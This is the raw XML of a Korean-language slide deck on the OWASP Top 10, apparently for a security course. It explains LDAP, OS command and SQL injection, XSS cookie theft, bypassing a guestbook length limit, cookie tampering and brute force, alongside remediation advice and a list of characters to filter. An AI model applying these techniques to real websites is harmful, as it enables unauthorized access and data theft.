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2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72" r:id="rId2"/>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="273" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="280" r:id="rId7"/>
    <p:sldId id="277" r:id="rId8"/>
    <p:sldId id="264" r:id="rId9"/>
    <p:sldId id="266" r:id="rId10"/>
    <p:sldId id="268" r:id="rId11"/>
    <p:sldId id="269" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="270" r:id="rId14"/>
    <p:sldId id="279" r:id="rId15"/>
    <p:sldId id="276" r:id="rId16"/>
    <p:sldId id="274" r:id="rId17"/>
    <p:sldId id="363" r:id="rId18"/>
    <p:sldId id="364" r:id="rId19"/>
    <p:sldId id="362" r:id="rId20"/>
    <p:sldId id="408" r:id="rId21"/>
    <p:sldId id="391" r:id="rId22"/>
    <p:sldId id="392" r:id="rId23"/>
    <p:sldId id="281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365" r:id="rId54"/>
    <p:sldId id="259" r:id="rId55"/>
    <p:sldId id="262" r:id="rId56"/>
    <p:sldId id="263" r:id="rId57"/>
    <p:sldId id="366" r:id="rId58"/>
    <p:sldId id="307" r:id="rId59"/>
    <p:sldId id="308" r:id="rId60"/>
    <p:sldId id="278" r:id="rId61"/>
    <p:sldId id="260" r:id="rId62"/>
    <p:sldId id="367" r:id="rId63"/>
    <p:sldId id="368" r:id="rId64"/>
    <p:sldId id="267" r:id="rId65"/>
    <p:sldId id="369" r:id="rId66"/>
    <p:sldId id="370" r:id="rId67"/>
    <p:sldId id="371" r:id="rId68"/>
    <p:sldId id="271" r:id="rId69"/>
    <p:sldId id="372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2" r:id="rId80"/>
    <p:sldId id="293" r:id="rId81"/>
    <p:sldId id="294" r:id="rId82"/>
    <p:sldId id="291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5" r:id="rId93"/>
    <p:sldId id="306" r:id="rId94"/>
    <p:sldId id="373" r:id="rId95"/>
    <p:sldId id="261" r:id="rId96"/>
    <p:sldId id="374" r:id="rId97"/>
    <p:sldId id="275" r:id="rId98"/>
    <p:sldId id="375" r:id="rId99"/>
    <p:sldId id="376" r:id="rId100"/>
    <p:sldId id="428" r:id="rId101"/>
    <p:sldId id="377" r:id="rId102"/>
    <p:sldId id="314" r:id="rId103"/>
    <p:sldId id="310" r:id="rId104"/>
    <p:sldId id="423" r:id="rId105"/>
    <p:sldId id="424" r:id="rId106"/>
    <p:sldId id="425" r:id="rId107"/>
    <p:sldId id="426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10" initials="W" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="Windows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76698" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75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D3C9-542B-4494-8BE9-083FB700EE0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57431-DF48-40F3-B0ED-9A9EC7092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/index.php?title=OWASP_TOP_10&amp;action=edit&amp;redlink=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B7%A8%EC%95%BD%EC%A0%90_%EC%8A%A4%EC%BA%90%EB%84%8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/index.php?title=%ED%8D%BC%EC%A0%80&amp;action=edit&amp;redlink=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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>전 세계 보안전문가들이 보안 취약점 진단 기준과 표준을 수립하고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>웹 어플리케이션 보안 관련 문서를 배포하고 보안 취약점 관련 툴을 개발하는 오픈소스 커뮤니티</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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30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검색 필터를 사용하는 웹 어플리케이션을 가지고 있다고 가정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존에 대한 속성을 보여줌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별표로 바뀐다면 요청을 다음과 같이 보낸다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필터는 맨 아래와 같이 처리가 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속성을 가진 모든 오브젝트들이 모두 일치되어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매칭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어플리케이션이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인젠셕에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취약한다면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어플리케이션의 실행흐름과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연결된 사용자의 권한에 의존하는 사용자의 속성의 일부 또는 전체를 보게 될 것입니다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LDAP(Lightweight Directory Access Protocol)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조직이나 기업에서 내부 자원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위치를 찾고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조작할 수 있게 하는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X.500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디렉터리 서비스를 위한 소프트웨어 프로토콜 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어플리케이션에서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입력한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쿼리를 수행하는데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적절히 제한하거나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않는다면</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/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‘LDAP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구문을 변경하여 개인정보 획득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LDAP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삭제등을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취약점 점검 방법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와일드 문자로 사용되는 * 기호를 입력하여 반환되는 데이터 량의 변화를 확인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② 특수 문자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취약점 조치 방안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쿼리로 입력한 값은 허용된 문자로만 검증이 되어야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 ) ; , * | &amp; =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쿼리에 영향을 주는 특수문자는 입력되지 못하게 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25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파라미터로 전달이 가능한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연동된 페이지에 대해여 시스템 명령어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(ls, cat, ifconfig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삽입으로 운영체제 명령어 실행 결과를 출력하는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인젝션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dirty="0"/>
              <a:t>위의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>파일은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파일 이름을 받고 그 파일을 삭제해 주는 기능을 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system()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사용하므로 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injection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 ; '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여러가지 명령어를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함수에 주입할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70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파라미터로 전달이 가능한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연동된 페이지에 대해여 시스템 명령어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(ls, cat, ifconfig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삽입으로 운영체제 명령어 실행 결과를 출력하는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인젝션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파일 이름을 받고 그 파일을 삭제해 주는 기능을 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system()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사용하므로 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injection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 ; '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여러가지 명령어를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함수에 주입할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44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파라미터로 전달이 가능한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연동된 페이지에 대해여 시스템 명령어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(ls, cat, ifconfig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삽입으로 운영체제 명령어 실행 결과를 출력하는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인젝션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파일 이름을 받고 그 파일을 삭제해 주는 기능을 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system()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사용하므로 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injection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 ; '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여러가지 명령어를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함수에 주입할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26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불충분한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로깅과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모니터링은 사고 대응의 비효율적인 통합 또는 누락과 함께 공격자들이 시스템을 더 공격하고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지속성을 유지하며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시스템을 중심으로 공격할 수 있도록 만들고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변조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 또는 파괴할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침해 사례에서 침해를 탐지하는 시간이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일이 넘게 걸리는 것을 보여주고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일반적으로 내부 프로세스와 모니터링보다 외부기관이 탐지한다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3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지속적인 취약점 점검에도 불구하고 취약한 코드 사용을 탐지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제거하지 못했고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대량의 개인정보 유출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행위를 탐지할 수 있는 최소한의 모니터링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 분석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활동마저 없어 장기간 유출 행위를 전혀 인지할 수 없었던 사고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0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통신사 고객 정보가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건을 유출하였습니다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시스템 관리 회사에 신용정보가 비정상적으로 조회되었는지 등 신용정보 조회이력 검토를 요청하였고 이를 통해 비정상적인 사용 패턴을 감지한 후 해당 사용자에 대한 모니터링을 통해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고객정보유출정황을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발견해 경찰에 신고하여 체포된 사건이 있었습니다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9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공격의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>87%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>가 불과 수분 만에 발생했다고 하고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이 중 비슷한 수준으로 빠르게 탐지해낸 경우는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>3%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에 불구하다고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4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INJECTION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에 대해서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53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세션 토큰 생성과정에서 취약점</a:t>
            </a:r>
          </a:p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시간관련 알고리즘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랜덤 숫자 생성의 알고리즘 등을 파악해서 패턴 추측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찾을 수 있음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토큰 처리과정에서 취약점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암호화되지 않은 통신에서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세션토큰을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 전송할 때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스니핑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로그아웃” 하지않고 브라우저 탭을 닫고 나가면 사용자는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여전히인증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3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hlinkClick r:id="rId3" tooltip="OWASP TOP 10 (없는 문서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OWASP TOP 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>은 웹 애플리케이션 취약점 중에서 빈도가 많이 발생하고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보안상 영향을 크게 줄 수 있는 것들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가지를 선정하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2004</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>년부터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년간의 간격으로 발표되었다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하지만 원래 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2016</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>년에 발표가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>나왔어야했는데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 err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>년늦어져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2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>년에 나오게 되었다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47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패스워드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무차별대입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로그인 실패 메시지에서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어느부분이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sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> 잘못되었는지 알려주면 공격자가 추론가능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5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95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 err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>점핑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강제요청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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>복사해서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>num</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>바꿔주고 주소에 붙여넣기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5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쿠키 변조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관리자의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>쿠키값</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 채취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54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//1.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다중인증으로 자동화된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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계정정보삽입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무차별공격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탈취된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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계정정보재사용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공격 예방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//3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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계정정보삽입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무차별공격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다른공격들이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탐지되면 관리자에게 알람이 오도록 설정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//4.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로그인 이후에 예측불허한 무작위 세션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ID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를 생성하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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서버측의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안전한 내장 세션관리자 사용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42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브라우징하는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 모든 파일을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파일탐색기처럼 원하는 문서로 바로 찾아갈 수 있게 하는 용도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81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클라우드 서비스 제공자가 다른 클라우드 서비스 이용자들이 인터넷을 통해 접근 가능한 상태로 디폴트 공유 권한을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열어둔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상태라면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클라우드 스토리지에 저장되어 있는 민감한 데이터에 대한 접근을 허용할 수도 있습니다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어딘가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위치하는 저장 공간에 내 정보를 보관해 두고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내가 필요할 때 내가 가지고 있는 각종 단말기를 통해서 불러올 수 있는 기술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 소프트웨어나 컴퓨터 프로그램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장치에서 사용자의 개입없이 자동으로 할당되는 설정 또는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‘모든 사람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(everyone)’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‘모든 권한’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10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6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컴포넌트의 결함은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>코딩 오류와 같은 실수에 의할 수도 있지만 백도어와 같은 고의적인 결함일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제로데이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어택이 취약점의 패치가 설치되기 전에 공격하는 기법이라면 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9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번 보안위험은 이미 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“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알려져있는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＂ 취약점이라는 점에서 차이가 있다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클래스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(class)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는 객체 지향 프로그래밍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(OOP)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에서 특정 객체를 생성하기 위해 변수와 메소드를 정의하는 일종의 틀이다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객체를 정의 하기 위한 상태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멤버변수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와 메서드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함수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로 구성된다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INJECTION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에 대해서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70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공격코드를 아무나 쉽게 찾을 수 있다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74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ko-KR" altLang="en-US" dirty="0"/>
              <a:t>워드 프레스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새로운거</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 다운받으면 페이지를 다시 만들어야 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>되서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 잘 안함 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>--&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>공격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0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 및 서버 측의 구성 요소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) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>와 해당 종속성의 버전을 지속적으로 관리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조작되거나</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>악의적인 구성 요소가 포함될 가능성을 줄이기 위해 서명된 패키지를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패치가 불가능한 경우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>발견된 문제를 모니터링</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>탐지 혹은 보호하기 위해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DD3A-C6E0-4B44-A4D8-4F1B88A53B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방식처럼 사용자의 쿠키 값을 빼낼 수 있게 되는 것이다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빼낸 쿠키를 통해서 사용자의 권한을 이용해서 웹 사이트에 접속 할 수 있게 된다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여기선 에러 메시지 페이지가 뜨지만 실제로는 자바 스크립트를 이용하여 실제 페이지와 유사하게 만들 수도 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사용자 입장에서 스크립트 코드를 직접 입력하진 않을 것이다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피싱을 여기서 이용해서 사용자가 모르게 하도록 하는 것이 보통의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공격이다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44297-5AEF-449A-A257-B394407B93F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45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그런데 전체가 복사되지 않고 스크립트가 짤린다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>왜냐면 방명록 글쓰기 개수가 제한되어 있기 때문이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>따라서 우회한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>위와 같이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 오른쪽 클릭후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>inspect element</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>클릭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44297-5AEF-449A-A257-B394407B93F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1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50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2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취약점은 애플리케이션이 인터프리터에 신뢰할 수 없는 데이터를 보낼 때 발생한다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 취약점은 매우 일반적이며 특히 낡은 코드에서 그렇다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이것들은 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SQL, LDAP,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Xpath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XML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SMTP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인수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발견된다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 취약점은 코드 검사 때에는 발견하기 쉽지만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시에는 발견하기 어려운 경우가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취약점 스캐너"/>
              </a:rPr>
              <a:t>취약점 스캐너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퍼저 (없는 문서)"/>
              </a:rPr>
              <a:t>퍼저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공격자가 삽입 취약점을 찾는 것을 도와준다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>이중에 가장 영향력이 높은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>은 </a:t>
            </a:r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LDAP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0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INJECTION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>은 해커가 해킹을 위해 조작한 쿼리들을 공격대상 웹사이트에 전송하고 웹사이트는 그 쿼리의 결과문에 의해서 공격대상 웹사이트 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에 접근하여 정보를 가져옵니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>그러한 해킹된 정보들이 해커에게 전송되는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>공격방식입니다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4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입력 받아 데이터베이스로 전달하는 정상적인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쿼리를 변조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삽입하여 불법 로그인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열람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명령 실행 등을 수행하여 비정상적인 데이터베이스 접근을 시도하는 공격 기법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4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INJECTION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>중에  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>SQL INJECTION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에 공격시나리오에 대해서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1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실행경로에 대해서 접근제어를 검사하지 않거나 불완전하게 구현하여 공격자로 하여금 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파라미터 값을 조작하여 중요정보를 접근 가능해지는 취약점을 말한다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이 공격을 통해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 err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>인젝션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불충분한 인증 및 인가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크로스 사이트 스크립트 공격에 활용될 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>과 유사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/>
              <a:t>Los 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>번문제인데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상에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 해서 푸는 문제입니다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72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조직이나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인터넷이나 기업 내의 인트라넷 등 네트워크 상에 있는 파일이나 장치들과 같은 자원 등의 위치를 찾을 수 있게 해주는 소프트웨어 프로토콜이다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시스템에서의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보면서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최상위에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루트디렉토리가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그아래에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/home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아래에는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말할 수가 있는 것 처럼 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LDAP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 그림에서 트리 구조의 최상위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dc=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database,dc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sarang,dc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=net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엔트리의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아래에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엔트리가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각각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=people, dc=database, dc=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dc=net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=manager, dc=database, dc=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dc=net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우리가 파일시스템을 읽을 때 하위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내려갈수록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/local/bin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같이 오른쪽으로 붙여나가는 방식과는 반대로 하위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엔트리로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내려갈수록 왼쪽으로 붙여나가는 방식이다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위 예제의 구조를 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사랑넷에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people(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그룹으로 나뉘고 관리자 그룹에는 유저 아이디가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advance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관리자가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한명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있으며 사람들 그룹아래로는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member(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guest(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그룹이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식으로 이해를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것에 대해 이해를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했을것이다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7431-DF48-40F3-B0ED-9A9EC7092E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7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7284A-7B67-48FF-8F55-1185A1DF4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A6C48C-305E-4D74-90D5-0E2F1587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BF2D4-5B3E-4A39-8650-D22BEC40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2E881-141E-42F4-9451-E4322987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86BC6-2FC4-4459-BEB7-70A9682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5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0960F-86C3-4E6A-9648-18FB60FC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9AC572-3C38-4765-9016-11DA97C0E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5F719-B197-466A-A63F-A2B83B25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F39CC-FFAC-4D96-91D6-5C2DAC59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18EA9-9686-4C03-ABEA-4B62F6FA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5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89AE5-837D-4397-870F-EFDD468FC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4C1FFD-347A-47A6-B132-7AE6DAD53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E1DC4-C096-47FF-9F58-886EBDE9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FBAE-7CC6-47A8-86AC-5E2D709B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42723-BBDF-4521-AD51-F49C2F27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69800-1BC6-4899-A529-8B44AB3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480AA-1692-4989-9BAD-309C1EC1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DE5BF-3C90-40C7-807B-51BFD5E3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5C8D2-8E05-4399-98F1-A5CA7C0B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27A72-67AD-45D6-8FD4-CEFB9B5E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1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1329-4ADF-47A1-BF3F-D9D62831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2E723-8E57-4FAF-A673-5A5FE1018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53412-65D4-409F-9DB9-9436118A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D2593-9BB7-4B07-96AF-08278581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E945F-E023-4DB3-A93D-75E83754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49045-6A59-43F5-AE29-ACE3C1AA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AAB4F-619E-4772-991E-49224AECE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A3957F-3205-4FD0-A4E3-CE2A9D310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55AFC-A897-49B5-8E34-A4161D4C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489B7-6F33-4B61-8E15-DBCEDADC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032371-7120-42B5-B9E9-8F4E9829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29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7358B-E49D-4799-9F5C-B93AA8AB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677DD5-1858-496E-A134-E741E6DB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BD02D1-E041-4ADF-BB1A-835881972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F6FC2-9E9D-4867-8B14-9B314AADA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7C09BA-FFE6-46D0-9979-1E623B192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37238A-C138-4BFE-B824-1958C265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99854E-B14D-4D82-B8D0-E6ED4626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8CC4AE-A343-47C3-8851-23F4AD6B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39F6B-DB32-416E-AF25-F338B03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916B77-137C-401D-8CAC-5D01795A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F1954C-D9C9-4FD9-BCC3-754F0259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7873F-521D-47FB-89C4-FFBE5D3C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EA3307-0512-46DA-9025-BFF61A64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8AF85F-816B-421C-A86C-927F8B29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68C98-3E8A-44E1-9734-DEA525AA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87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4CB20-EC99-476D-9363-1B9A38CF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9D90B-B056-45E9-AB1F-90703BCED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D9ECE6-6CBC-4809-98E1-6694B505D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96641-B27E-4CE9-97EF-2FFF5C83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EAD55-CED8-4366-AE91-0C7D6B59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30BD5F-3D48-4211-AE2B-8D5A76CF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5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F41BD-B66A-421E-8D5D-16AD8230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B5C262-7D8C-49BE-A267-5B603771D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0DF265-7B38-47E4-8922-18E84338C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363B0-A024-4045-BAA2-F0052911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965FB-968B-4416-A60C-5D35F130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61274-E336-4E9D-8985-A77CCC5F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7292A8-CF30-41AE-9865-0955D2D6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87745-810C-4864-8B9F-091B1CE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70F7D-72BC-43D8-BCAF-2CCDBC1A8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A79EC-E3D0-4EED-8C38-95712417257C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B68B2-3F29-474C-8837-E1F04F3DC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112D5-A891-4344-A4B0-B9884788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2E3C-1267-4D66-BC19-81088136B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1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los.eagle-jump.org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sa.or.kr/uploadfile/201312/201312161355109566.pdf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A2F7D-A1E6-44C2-B8A2-1B22A650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789F1-639E-4C64-8CAD-185C822AAC88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OWASP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2A26C-9D3E-4949-8C47-7B4302348661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2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193211" y="1289377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519570" y="1565690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731065" y="2477079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321365" y="2477079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893764" y="3503276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2451878" y="3503276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2178" y="3715329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811080" y="5018712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88166" y="5113335"/>
            <a:ext cx="720813" cy="699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2326594" y="2159130"/>
            <a:ext cx="278814" cy="416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9" idx="5"/>
            <a:endCxn id="46" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3134822" y="2162611"/>
            <a:ext cx="292104" cy="416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8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2277030" y="3176415"/>
            <a:ext cx="280409" cy="4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793350" y="4202612"/>
            <a:ext cx="256576" cy="81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5" idx="3"/>
            <a:endCxn id="47" idx="7"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1509016" y="3074000"/>
            <a:ext cx="327610" cy="531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7" idx="4"/>
            <a:endCxn id="51" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1148573" y="4202612"/>
            <a:ext cx="105598" cy="910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859895" y="3142455"/>
            <a:ext cx="368826" cy="572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267481" y="1616155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/(root)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97210" y="2269788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home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60935" y="3339469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sjackie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80536" y="2614694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usr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98200" y="3668278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src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51730" y="5126394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linux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27971" y="4834046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bin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0232" y="3339845"/>
            <a:ext cx="90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local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3910" y="5909164"/>
            <a:ext cx="597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파일 시스템에서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r>
              <a:rPr lang="ko-KR" altLang="ko-KR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디렉토리의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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구조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8501824" y="2522058"/>
            <a:ext cx="720813" cy="69933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>
            <a:endCxn id="95" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7457489" y="3221394"/>
            <a:ext cx="280409" cy="42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93" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6689475" y="3118979"/>
            <a:ext cx="327610" cy="531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9040354" y="3187434"/>
            <a:ext cx="368826" cy="572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888031" y="3711582"/>
            <a:ext cx="164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uid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=advance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726344" y="5023397"/>
            <a:ext cx="164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uid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=</a:t>
            </a:r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sjsong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5134326" y="1398456"/>
            <a:ext cx="6716249" cy="4459194"/>
            <a:chOff x="5134326" y="1398456"/>
            <a:chExt cx="6716249" cy="4459194"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="92" name="타원 91"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7700029" y="1610669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911524" y="2522058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7632337" y="3548255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9222637" y="3760308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7991539" y="5063691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5968625" y="5158314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 flipH="1">
              <a:off x="7507053" y="2204109"/>
              <a:ext cx="278814" cy="416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92" idx="5"/>
              <a:endCxn id="94" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
